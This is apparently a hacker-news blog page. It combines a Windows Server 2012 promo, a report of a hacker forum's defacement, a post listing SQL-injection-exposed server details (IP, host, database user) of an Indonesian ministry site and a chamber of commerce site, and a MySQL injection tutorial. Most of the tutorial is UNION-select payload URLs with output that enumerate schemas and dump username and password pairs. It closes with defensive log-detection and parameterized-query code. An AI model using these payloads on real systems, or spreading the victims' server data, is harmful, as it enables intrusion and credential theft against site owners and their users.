The Power of Many Servers, the Simplicity of One:- Delivers a highly available and easy to manage cloud-optimized platform. Windows Server 2012 can help you provide:

  • Flexible Storage- Diverse storage choices that can help you achieve high performance, availability, and storage resource efficiency through virtualization and storage conservation.
  • Continuous Availability- New and improved features that provide cost-effective, highly available services with protection against a wide range of failure scenarios.
  • Management Efficiency- Automation of a broad set of management tasks and simplified deployment of workloads as you move toward full, lights-out automation.

Every App, Any Cloud:- Offers a cloud-optimized server platform that gives you the flexibility to build and deploy applications and websites on-premises, in the cloud, or across both. Windows Server 2012 can help you deliver:

  • Flexibility to Build On-Premises and in the Cloud- A consistent set of tools and frameworks that enables developers to build symmetrical or hybrid applications across the datacenter and the cloud.
  • A Scalable and Elastic Infrastructure- New features to help you increase website density and efficiency, plus frameworks, services, and tools to increase the scalability and elasticity of modern applications.
  • An Open Web and App Development Environment- An open platform that enables mission-critical applications and provides enhanced support for open standards, open-source applications, and various development languages.


Modern Workstyle, Enabled:- Provides users with flexible access to data and applications while simplifying management and maintaining security, control, and compliance. Windows Server 2012 can help you offer:

  • Access to Applications and Data from Virtually Anywhere, Any Device- Seamless, on-demand access to virtualized work environments from virtually anywhere.
  • A Full Windows Experience Anywhere- A personalized and rich user experience from virtually any device that adapts to different network conditions quickly and responsively.
  • Enhanced Data Security and Compliance- Granular access to data and corporate resources based on strong identity, data classification, and centralized policy administration and auditing.



-Source (Microsoft) 








Teamgreyhat Official Forum Hacked


The official forum of Teamgreyhat, one of the most popular hacker groups, has been hacked. A hacker named Hunt hacked into TGH's web server and defaced the index page. The hacker also claimed to have breached all the data on that server. Since 2011 Teamgreyhat has become a very popular forum for hackers, and TGH is regarded as one of the most dangerous blackhat teams because, if you dig into the history, you will find that TGH has rooted many web servers and hacked millions of sites. Their last breach, of Ankit Fadia's server, gave them more popularity. But this hack will surely have a negative impact on TGH's reputation. The hacker also created a deface mirror on Arab-zone.

Teamgreyhat Reaction:- 
After this hack the Teamgreyhat authority instantly released a statement. In it they dismissed the incident, saying that Hunt (the one who hacked the TGH forum) belongs to the TGH core team and has full privileges on their server; in short, he was maintaining that web server, and an admin can easily damage his own system. They also clearly stated that this was an internal attack: the hacker knew all the passwords, logged into the system with them and changed the index page.





British Chamber of Commerce & Ministry of Culture and Tourism Indonesia Hacked By TEAM T!g3R


Vulnerability found by TEAM T!g3R on the official website of Ministry of Culture & Tourism and British Chamber of Commerce, Indonesia.
Vulnerable Website:-
http://www.budpar.go.id
http://www.britcham.or.id
 
Vulnerability:-
SQL-i
TEAM T!g3R also hacked into the database of these two websites and exposed sensitive data like server details, DB name, user name, password, admin details and so on.

Ministry of Culture & Tourism Indonesia:-

Database Name:-
Current DB:- budpar
Current DB:- information_schema

Web-Server:- Apache/2.2.14 (Fedora)

British Chamber of Commerce Indonesia:-
Server Details:-
Target:-                 http://www.britcham.or.id
Host IP:-                202.67.9.74
Web Server:-         Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Powered-by:-          PHP/5.2.17
DB Server:-            MySQL
Resp. Time(avg):-   2744 ms
Current User:-        britcham_user1@localhost
Sql Version:-           5.0.51a-community
Current DB:-           britcham_database
System User:-         britcham_user1@localhost
Host Name:-           asterix.serverku.com
Installation dir:-    /
DB User:-               'britcham_user1'@'localhost'






We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article by Mr. Rafael Souza, a great admirer and fan of VOGH, who has gladly shared his brilliant research paper on SQL injection (MySQL) with us. Rafael is very passionate about the cyber security domain; he is keenly involved with the GreyHat Community and is a maintainer/designer of the Brazilian Backtrack Team. So without wasting time, let's go and see what Rafael has for us:-

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of the mental response. To explain more comprehensively: we humans tend to err, and for this reason we are the greatest tool for finding these errors, since even the software for vulnerability analysis and scanning was improved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the fraud techniques best known to web developers is SQL injection. It is the manipulation of an SQL statement through the variables that make up the parameters received by a server-side script; it is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements into a query by manipulating the input data of an application.

STEP BY STEP
 
(Figure 1) Detecting
Searching for the number of columns: we test first with an error, then without one; when there is no error, the number can be said to be found.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions 5.x.y and above [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions 5.x.y and above [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => search for everything you want, with ASCII characters
concat() => search for what you want, with ASCII characters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +
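For defenders, the request shapes above leave a recognisable trace in web server access logs. The following is an added example, not part of the original article: a small log triage script that flags these patterns and decodes the `0x...` and `char(...)` literals so an analyst can see which table name was being asked about. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (combined-log style). The IPs are documentation
# addresses; the query strings reuse the request shapes shown in the article.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Jan/2013:10:00:01 +0000] "GET /query.php?string=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jan/2013:10:00:09 +0000] "GET /query.php?string=1%20union%20all%20select'
    '%201,2,3,4,group_concat(column_name)%20from%20information_schema.columns'
    '%20where%20table_name=0x7573756172696f73-- HTTP/1.1" 200 734',
    '203.0.113.7 - - [10/Jan/2013:10:00:15 +0000] "GET /query.php?string=1%20union%20all%20select'
    '%201,2,3,4,concat(column_name)%20from%20information_schema.columns%20where'
    '%20table_name=char(117,115,117,97,114,105,111,115)%20limit%200,1-- HTTP/1.1" 200 698',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Indicators taken from the techniques the article walks through.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "concat_family": re.compile(r"\b(?:group_concat|concat_ws|concat)\s*\(", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)


def decode_literals(text):
    """Decode 0x.. and char(..) literals used to avoid quoting a table name."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        decoded.append(bytes.fromhex(m.group(1)).decode("utf-8", "replace"))
    for m in CHAR_CALL.finditer(text):
        decoded.append("".join(chr(int(n)) for n in m.group(1).split(",")))
    return decoded


def analyze_line(line):
    """Return a triage record for one log line, or None if it holds no request."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    query = unquote_plus(target.query)  # undo %20 / + before matching
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
    return {
        "client": line.split(" ", 1)[0],
        "path": target.path,
        "hits": hits,
        "decoded": decode_literals(query),
        "suspicious": "union_select" in hits or len(hits) >= 2,
    }


def report(lines):
    """Keep only the records worth an analyst's attention."""
    return [r for r in map(analyze_line, lines) if r and r["suspicious"]]


if __name__ == "__main__":
    for rec in report(SAMPLE_LOG):
        print(rec["client"], rec["path"], rec["hits"], "decoded:", rec["decoded"])
```

Matching on the decoded query string matters here: the raw log stores spaces as `%20`, so a pattern applied to the undecoded line would miss every request.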

Readers, this article is for educational purposes only; I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other things. So I want to emphasize that this paper is for security researchers and developers, to beware and test your code.

CONCLUSION
Many companies keep important information on their websites and in their databases; information is the most valuable asset, and it is intangible. The question is how developers are dealing with this huge responsibility.
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what SQL injection is, how applications are exploited, and techniques for testing, allowing the developer to build a more robust system and understand the vulnerability.
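To make the article's advice to developers concrete, here is an added example, not code from the article or its author, that puts the vulnerable pattern behind `query.php?string=` next to a hardened handler. It assumes Python with an in-memory SQLite database standing in for PHP and MySQL; the `noticias` table, the sample rows and all function names are hypothetical, while `usuarios` and `login` follow the article.

```python
import re
import sqlite3

# Request value in the shape the article uses; everything else is constructed.
PAGE_PAYLOAD = "1 union all select 1,2,3,4,login from usuarios--"
COLUMNS = "id, titulo, autor, data, corpo"


def make_db():
    """Constructed sample database (SQLite standing in for MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE noticias (id INTEGER, titulo TEXT, autor TEXT, data TEXT, corpo TEXT);
        INSERT INTO noticias VALUES (1, 'Hello', 'staff', '2013-01-01', 'First post');
        CREATE TABLE usuarios (id INTEGER, login TEXT, passwd TEXT, texto TEXT);
        INSERT INTO usuarios VALUES (1, 'sample_user', 'sample_secret', '');
    """)
    return db


def lookup_vulnerable(db, string):
    # BEFORE: the request value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    sql = f"SELECT {COLUMNS} FROM noticias WHERE id = {string}"
    return db.execute(sql).fetchall()


def handle_request_vulnerable(db, string):
    # BEFORE: database errors are echoed to the client. The article's column
    # guessing and error-based output both depend on seeing these messages.
    try:
        return 200, lookup_vulnerable(db, string)
    except sqlite3.Error as exc:
        return 500, str(exc)


def lookup_bound(db, string):
    # AFTER: the value travels as a bound parameter and is only ever compared
    # as data; it is never parsed as SQL.
    sql = f"SELECT {COLUMNS} FROM noticias WHERE id = ?"
    return db.execute(sql, (string,)).fetchall()


def handle_request(db, string):
    """AFTER: validate the type, bind the value, return generic errors."""
    if not re.fullmatch(r"[0-9]{1,9}", string):
        return 400, "invalid id"
    try:
        rows = lookup_bound(db, int(string))
    except sqlite3.Error:
        # Log the detail server-side; the client gets no schema hints.
        return 500, "internal error"
    return (200, rows) if rows else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAGE_PAYLOAD))
    print("bound:     ", lookup_bound(db, PAGE_PAYLOAD))
    print("hardened:  ", handle_request(db, PAGE_PAYLOAD))
```

In PHP the equivalent of `lookup_bound` is a prepared statement with a bound parameter (PDO or mysqli), combined with a database account for the site that has no rights beyond the tables it needs.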
**********
I hope you all will enjoy the above article, as I did. On behalf of the entire VOGH Team I sincerely thank Mr. Rafael Souza for his remarkable contribution.
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


